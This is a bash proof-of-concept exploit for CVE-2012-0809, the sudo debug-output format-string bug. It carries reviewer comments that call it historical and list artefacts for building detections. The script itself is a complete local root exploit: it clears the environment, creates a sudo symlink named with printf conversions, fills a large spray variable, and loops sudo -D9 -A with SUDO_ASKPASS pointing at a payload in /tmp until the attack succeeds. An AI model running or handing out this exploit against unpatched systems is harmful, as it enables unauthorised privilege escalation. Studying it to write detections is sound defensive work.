CVE-2012-0809 Exploit
#!/bin/bash
# CVE-2012-0809 exploit
# joernchen of Phenoelit's version
# Payload to be executed goes to /tmp/a (might be a shell script)
#
# NOTE(review): historical proof-of-concept for the sudo debug-output
# format-string bug (CVE-2012-0809, patched upstream in 2012); it is only
# relevant against the affected, unpatched 1.8.x releases.  Kept for study
# and for building detections.  Every observable artefact is visible in
# this script, which makes it a useful reference for alerting:
#   - a symlink to /usr/bin/sudo created under /tmp whose *name* contains
#     printf conversions (%...x, %...$n)
#   - a process environment wiped and refilled with one huge variable (A)
#     built from a repeated 4-byte sequence
#   - sudo run in a tight loop with -D9 (debug level), -A and SUDO_ASKPASS
#     pointing at a file in /tmp, until its exit status becomes 1
# Exec of a sudo symlink with '%' in argv[0], or SUDO_ASKPASS pointing at a
# world-writable directory, are each worth an audit/execve rule on their own.
# Note the script never checks that /tmp/a exists or is executable.

# Work from /tmp; there is no error check, so if this cd fails the relative
# symlink below is created in whatever the cwd happened to be.
cd /tmp
/bin/echo '-> Clearing ENV'
# Wipe every exported variable so the environment handed to sudo is exactly
# what the lines below set.  Backticks and the unquoted $i are tolerable
# only because variable *names* contain no whitespace or globs; a value with
# an embedded newline would still yield a junk token (unset merely fails on
# it), and read-only shell variables make unset complain, harmlessly.
for i in `env |cut -f1 -d "="` ;do unset $i;done
/bin/echo '-> Creating symlink'
# The symlink's basename is the trigger: the affected sudo reportedly used
# its own program name inside a format string in debug output, and this name
# carries printf conversions.  The backslash keeps the shell from expanding
# $n, so the literal characters "$n" end up in the filename.
/bin/ln -s /usr/bin/sudo ./%134520134x%900\$n
/bin/echo '-> Setting ENV'
# Environment layout for the target process: one marker variable and one
# large variable A grown by appending the same 4 bytes 5000 times.
# echo -n -e is a bashism (fine under #!/bin/bash); $A is unquoted but holds
# no IFS characters, so no word-splitting occurs.  Each iteration forks for
# the command substitution -- printf -v would avoid that -- left as-is since
# the exact bytes, not the speed, are what this section is about.
export AAA=AAAA;
export A;
for i in `/usr/bin/seq 1 5000`; do
export A=$A`echo -n -e '\x24\x83\x05\x08'`;
done;
/bin/echo '-> Now a little Brute-Force'
# Re-run the symlinked sudo until it exits with status 1; any other status
# (including 0) repeats.  There is no iteration cap, so on a system where
# sudo never returns 1 this loops forever.  2>/dev/null hides sudo's own
# diagnostics, so a non-working run gives no clue why.  -A tells sudo to
# obtain the password through the SUDO_ASKPASS helper; that helper path is
# where /tmp/a from the header comment comes in.
while true ; do SUDO_ASKPASS=/tmp/a ./%134520134x%900\$n -D9 -A id 2>/dev/null ; if [[ "$?" == "1" ]]; then break ;fi ; done
/bin/echo '-> Cleaning up'
# Removes only the symlink; /tmp/a is left behind and nothing is restored in
# the (already wiped) environment of this shell.
/bin/rm /tmp/%134520134x%900\$n